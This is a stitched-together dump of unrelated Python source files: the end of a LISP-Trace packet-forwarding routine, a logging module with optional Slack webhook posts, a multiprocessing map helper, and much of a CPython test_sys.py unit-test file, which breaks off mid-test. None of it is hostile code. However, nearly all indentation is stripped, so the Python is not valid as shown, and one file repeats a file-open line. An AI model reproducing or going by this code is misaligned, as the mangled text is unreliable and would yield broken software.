#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Add recent-rtts and recent-hops.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
    # Search for the record. If we are appending the first ITR node entry,
    # get its RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
    # Otherwise we are forwarding a packet that is about to be encapsulated,
    # or we are forwarding a packet that was just decapsulated with the
    # addresses swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
    # If we are swapping addresses, do it here so the JSON append and IP
    # header field changes are all reflected in the new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
#------------------------------------------------------------------------------
|
infolog.py
|
# -*- coding:utf-8 -*-
import atexit
import json
from datetime import datetime
from threading import Thread
from urllib.request import Request, urlopen
_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, 'a', encoding="utf-8")
_file = open(filename, 'a', encoding="utf-8")
_file.write('\n-----------------------------------------------------------------\n')
_file.write('Starting new {} training run\n'.format(run_name))
_file.write('-----------------------------------------------------------------\n')
_run_name = run_name
_slack_url = slack_url
def log(msg, end='\n', slack=False):
#print(msg, end=end)
if _file is not None:
_file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg))
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header('Content-Type', 'application/json')
urlopen(req, json.dumps({
'username': 'tacotron',
'icon_emoji': ':taco:',
'text': '*%s*: %s' % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
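# Example usage (a sketch; the filename, run name, and webhook URL are made
# up):
#
#   init('logs/train.log', 'tacotron-run1',
#        slack_url='https://hooks.slack.com/services/XXX')
#   log('Step 100: loss=0.123', slack=True)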
|
mp.py
|
import sys
import marshal
import multiprocessing as mp
try:
import progressbar as pb
except ImportError:
pass
def map(func, iterable, procs = mp.cpu_count()):
input, output = mp.Queue(), mp.Queue()
length = mp.Value('i',0)
def _fill(iterable, procs, input, output):
for data in enumerate(iterable):
input.put(data)
length.value += 1
for _ in range(procs*2):
input.put((-1,-1))
def _func(proc, input, output):
idx, data = input.get()
while idx != -1:
output.put((idx, func(data)))
idx, data = input.get()
filler = mp.Process(target = _fill, args=(iterable, procs, input, output))
filler.daemon = True
filler.start()
for i in range(procs):
proc = mp.Process(target=_func, args=(i, input, output))
proc.daemon = True
proc.start()
try:
iterlen = len(iterable)
    except TypeError:
        # The iterable has no len(); wait for the filler process to finish
        # counting items.
        filler.join()
        iterlen = length.value
    data = [None]*iterlen
try:
progress = pb.ProgressBar(widgets=[pb.Percentage(), pb.Bar()], maxval=iterlen)
progress.start()
for i in range(iterlen):
idx, result = output.get()
data[idx] = result
progress.update(i+1)
progress.finish()
except NameError:
for _ in range(iterlen):
idx, result = output.get()
data[idx] = result
return data
if __name__ == "__main__":
#pool = Pool()
#data = pool.map(
map(lambda x: max(x), zip(*(iter(range(65536)),)*3))
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (10, 25, 50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
self.assertRaises(RecursionError, f)
self.assertRaises(RecursionError, f)
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than the "lower-water
# mark". Otherwise, it may not be possible anymore to
# reset the overflowed flag to 0.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
# formula extracted from _Py_RecursionLimitLowerWaterMark()
if limit > 200:
depth = limit - 50
else:
depth = limit * 3 // 4
set_recursion_limit_at_depth(depth, limit)
finally:
sys.setrecursionlimit(oldlimit)
# The error message is specific to CPython
@test.support.cpython_only
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RecursionError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: _Py_CheckRecursiveCall: "
b"Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a nonexistent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# has no effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
